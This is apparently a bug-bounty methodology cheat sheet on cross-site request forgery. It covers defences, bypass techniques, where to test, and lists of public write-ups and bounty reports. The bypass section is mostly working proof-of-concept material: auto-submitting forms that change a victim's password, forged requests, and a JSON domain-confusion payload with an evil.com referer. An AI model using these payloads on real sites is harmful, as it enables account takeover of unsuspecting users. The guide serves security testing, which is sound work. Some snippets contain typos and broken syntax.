CSRF

CWE-352: Cross-Site Request Forgery (CSRF)

What it is ??

Cross-Site Request Forgery (CSRF/XSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated.

CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. - OWASP

Methodology

image

CSRF Common Defenses

Usinf CSRF Tokens to Prevent CSRF Attacks

SequenceDiagram.org - UML Sequence Diagram Online Tool

Full Diagram For Methods to Prevent CSRF Attacks

1. CSRF Tokens

2. SameSite Cookie

3. Json Content-Type

4. Requiring Re-authentication for Sensitive Actions

5. Double Submit Cookie Pattern

6. Origin and Referer Header Validation

7. Captchas

8. Custom Request Headers

CSRF Bypasses

• ClickJacking

  <html>
   <head>
   <title>Clickjack test page</title>
   </head>
   <body>
   <p>This page is vulnerable to clickjacking if the iframe is not blank!</p>
   <iframe src="PAGE_URL" width="500" height="500"></iframe>
   </body>
  </html>

• Change Request Method

  # Request
  POST /password_change
  Host: email.example.com
  Cookie: session_cookie=YOUR_SESSION_COOKIE
  (POST request body)
  new_password=abc123&csrf_token=871caef0757a4ac9691aceb9aad8b65b
  --------------------------------------------
  
  # Bypass
  GET /password_change?new_password=abc123
  Host: email.example.com
  Cookie: session_cookie=YOUR_SESSION_COOKIE

• Bypass CSRF Tokens stored on the server

  # remove the token
  POST /password_change
  Host: email.example.com
  Cookie: session_cookie=YOUR_SESSION_COOKIE
  (POST request body)
  new_password=abc123
  -------------------------------------------------------------
  <html>
   <form method="POST" action="<https://email.example.com/password_change>" id="csrf-form">
   <input type="text" name="new_password" value="abc123">
   <input type='submit' value="Submit">
   </form>
   <script>document.getElementById("csrf-form").submit();</script>
  </html>
  ----------------------------------------------------------------
  # Empty Parameter
  POST /password_change
  Host: email.example.com
  Cookie: session_cookie=YOUR_SESSION_COOKIE
  (POST request body)
  new_password=abc123&csrf_token=
  ---------------------------------------------------------------------
  <html>
   <form method="POST" action="<https://email.example.com/password_change>" id"csrf-form">
   <input type="text" name="new_password" value="abc123">
   <input type="text" name="csrf_token" value="">
   <input type='submit' value="Submit">
  </form>
   <script>document.getElementById("csrf-form").submit();</script>
  </html>
  --------------------------
  # Expected Code
  def validate_token():
   if (request.csrf_token == session.csrf_token):
  		 pass
   else:
  	 throw_error("CSRF token incorrect. Request rejected.")
  [...]
  def process_state_changing_action():
  	 if request.csrf_token:
  		 validate_token()
  		 execute_action()

• Weak Token Integriti ( Reuse token )

  POST /password_change
  Host: email.example.com
  Cookie: session_cookie=YOUR_SESSION_COOKIE
  (POST request body)
  new_password=abc123&csrf_token=871caef0757a4ac9691aceb9aad8b65b
  ----------------------------------
  <html>
   <form method="POST" action="<https://email.example.com/password_change>" id"csrf-form">
   <input type="text" name="new_password" value="abc123">
   <input type="text" name="csrf_token" value="871caef0757a4ac9691aceb9aad8b65b ">
   <input type='submit' value="Submit">
  </form>
   <script>document.getElementById("csrf-form").submit();</script>
  </html>
  --------------------------------------------------------------
  ## Expected Code
  def validate_token():
   if request.csrf_token:
  	 if (request.csrf_token in valid_csrf_tokens):
  			 pass
  	 else:
  		 throw_error("CSRF token incorrect. Request rejected.")
  [...]
  def process_state_changing_action():
   	 validate_token()
  	 execute_action()
  ------------------------------------------------------------------------
  # Exploit 
  If the token is fixed value for the account then change the email to victim's email and make CSRF poc
  with the old CSRF token from old requests

• Bypass Double submit CSRF tokens

  # Valid 
  POST /password_change
  Host: email.example.com
  Cookie: session_cookie=YOUR_SESSION_COOKIE; csrf_token=871caef0757a4ac9691aceb9aad8b65b
  (POST request body)
  new_password=abc123&csrf_token=871caef0757a4ac9691aceb9aad8b65b
  --------------------------
  # Invalid
  POST /password_change
  Host: email.example.com
  Cookie: session_cookie=YOUR_SESSION_COOKIE; csrf_token=1aceb9aad8b65b871caef0757a4ac969
  (POST request body)
  new_password=abc123&csrf_token=871caef0757a4ac9691aceb9aad8b65b
  ---------------------------------------
  # Bypass 
  POST /password_change
  Host: email.example.com
  Cookie: session_cookie=YOUR_SESSION_COOKIE; csrf_token=not_a_real_token
  (POST request body)
  new_password=abc123&csrf_token=not_a_real_token

• Bypass CSRF Referer Header Check

  # Just Remove The referrer
  <html>
   <meta name="referrer" content="no-referrer">
   <form method="POST" action="<https://email.example.com/password_change>" id="csrf-form">
   <input type="text" name="new_password" value="abc123">
   <input type='submit' value="Submit">
   </form>
   <script>document.getElementById("csrf-form").submit();</script>
  </html>
  --------------------
  # Expected Code
  def validate_referer():
   if (request.referer in allowlisted_domains):
  pass
   else:
   throw_error("Referer incorrect. Request rejected.")
  [...]
  def process_state_changing_action():
   if request.referer:
   validate_referer()
   execute_action()
  ---------------------------
  # another way
  POST /password_change
  Host: email.example.com
  Cookie: session_cookie=YOUR_SESSION_COOKIE;
  Referer: example.com.attacker.com
  (POST request body)
  new_password=abc123
  ------------------
  # Vulnerable code
  def validate_referer():
   if request.referer:
   if ("example.com" in request.referer):
   pass
   else:
   throw_error("Referer incorrect. Request rejected.")
  [...]
  def process_state_changing_action():
   validate_referer()
   execute_action()
   
   

• CSRF in JSON-Based Requests

Exploiting JSON-Based CSRF: The Hidden Threat in Profile Management | Sec-88

CSRF Bypass Using Domain Confusion Leads To ATOMedium

<html>
  <head><meta name="referrer" content="unsafe-url"></head>
  <body>
  <script>history.pushState('', '', '/')</script>
  <form name="hacker" method="POST" action="https://account.example.com/phone.json" enctype="text/plain">
    <input type="hidden"
    name= '{"phone":"01111111118","a":"' value='"}'>
    </form>
    <script>
      history.pushState("", "", "/anything@account.example.com")
      document.forms[0].submit();
    </script>
  </body>
</html>

------------------------------
# Request
POST /phone.json
Host: account.example.com
Cookie: session_cookie=YOUR_SESSION_COOKIE;
Referer: https://evil.com/test@example.com

{"phone":"01111111118","a":""}

• Bypass CSRF Protection by Using XSS

  Steal victim CSRF Token Via XSS Vulnerability

• Replace the token with unreal token but with the same length

• Bypass using subdomain takeover + CORS

How I found my first Subdomain Takeover vulnerabilityMedium

• Try to decrypt the hash (maybe CSRF is a hash)

• Analyze Token(use burp)

  • Sometimes Anti-CSRF token is composed of two parts, one of them remains static while the other one is dynamic."837456mzy29jkd911139" for one request the other time "837456mzy29jkd337221" if you notice, "837456mzy29jkd" part of the token remains same, send the request with only the static part

• Sometimes the anti-csrf check is dependent on User-Agent as well.

  • If you try to use a mobile/tablet user agent, the application may not even check for an anti-csrf token.

Slides

Where To Find

1. Authentication-Required Actions: Look for actions that require authentication, such as changing account settings, updating passwords, or making transactions. These are common areas where CSRF vulnerabilities can have significant impact.

2. User Profile Changes: Check for actions related to user profile changes, such as updating email addresses, changing personal information, or modifying profile pictures.

3. Account Deletion or Suspension: Actions that allow a user to delete or suspend their account could be targets for CSRF attacks.

4. Payment and Transactional Actions: Look for payment-related actions like making transactions, adding payment methods, or modifying subscription plans.

5. Form Submissions: Any action that involves form submissions could potentially be a target. This includes actions like submitting support tickets, submitting feedback, or submitting any kind of content.

6. CSRF Tokens: Some applications use CSRF tokens as a mitigation technique. Look for instances where CSRF tokens are missing or improperly validated. You might find CSRF tokens in hidden fields within HTML forms or as headers in AJAX requests.

7. Third-Party Integrations: If the application integrates with third-party services or APIs, check if these integrations are susceptible to CSRF attacks.

8. Changing Security Settings: Actions related to changing security settings, like enabling two-factor authentication (2FA) or changing security questions, can also be targets.

9. Privilege Escalation: Actions that involve escalating user privileges, such as changing a user's role or permissions, should be thoroughly tested for CSRF vulnerabilities.

10. Logging Out: Even the logout functionality can be exploited through CSRF attacks, forcing a victim to unknowingly log out.

11. Password Reset: If the password reset process doesn't include proper CSRF protections, an attacker could potentially change a user's password without their consent.

12. test login, logout, reset pass, change password, add-cart, like, comment, profile change, user details change, balance transfer, subscription, etc

Write-ups

• How a simple CSRF attack turned into a P1

• How I exploited the json csrf with method override technique

• How I found CSRF(my first bounty)

• Exploiting websocket application wide XSS and CSRF

• Site wide CSRF on popular program

• Using CSRF I got weird account takeover

• CSRF CSRF CSRF

• Google Bugbounty CSRF in learndigital.withgoogle.com

• CSRF token bypass [a tale of 2k bug]

• 2FA bypass via CSRF attack

• Stored iframe injection CSRF account takeover

• Instagram delete media CSRF

• An inconsistent CSRF

• Bypass CSRF with clickjacking worth 1250

• Sitewide CSRF graphql

• Account takeover using CSRF json based

• CORS to CSRF attack

• My first CSRF to account takeover

• 4x chained CSRFs chained for account takeover

Reports

1. CSRF on connecting Paypal as Payment Provider to Shopify - 287 upvotes, $500

2. Account Takeover using Linked Accounts due to lack of CSRF protection to Rockstar Games - 227 upvotes, $1000

3. Periscope android app deeplink leads to CSRF in follow action to Twitter - 204 upvotes, $1540

4. Chaining Bugs: Leakage of CSRF token which leads to Stored XSS and Account Takeover (xs1.tribalwars.cash) to InnoGames - 186 upvotes, $1100

5. Site wide CSRF affecting both job seeker and Employer account on glassdoor.com to Glassdoor - 152 upvotes, $3000

6. CSRF leads to a stored self xss to Imgur - 141 upvotes, $500

7. CSRF protection bypass in GitHub Enterprise management console to GitHub - 138 upvotes, $10000

8. Slack integration setup lacks CSRF protection to HackerOne - 134 upvotes, $2500

9. Lack of CSRF header validation at https://g-mail.grammarly.com/profile to Grammarly - 129 upvotes, $750

10. CSRF token validation system is disabled on Stripe Dashboard to Stripe - 105 upvotes, $2500

11. Cross-Site Request Forgery (CSRF) vulnerability on API endpoint allows account takeovers to Khan Academy - 101 upvotes, $0

12. CSRF Vulnerability on https://signin.rockstargames.com/tpa/facebook/link/ to Rockstar Games - 98 upvotes, $1000

13. CSRF to HTML Injection in Comments to WordPress - 94 upvotes, $950

14. One Click Account takeover using Ouath CSRF bypass by adding Null byte %00 in state parameter on www.streamlabs.com to Logitech - 85 upvotes, $200

15. CSRF in Account Deletion feature (https://www.flickr.com/account/delete) to Flickr - 82 upvotes, $750

16. Account takeover at https://try.discourse.org due to no CSRF protection in connecting Yahoo account to Discourse - 81 upvotes, $512

17. CSRF token validation system is disabled on Stripe Dashboard to Stripe - 80 upvotes, $2500

18. [CRITICAL] Full account takeover using CSRF to Twitter - 79 upvotes, $5040

19. CSRF Account Takeover to TikTok - 78 upvotes, $2373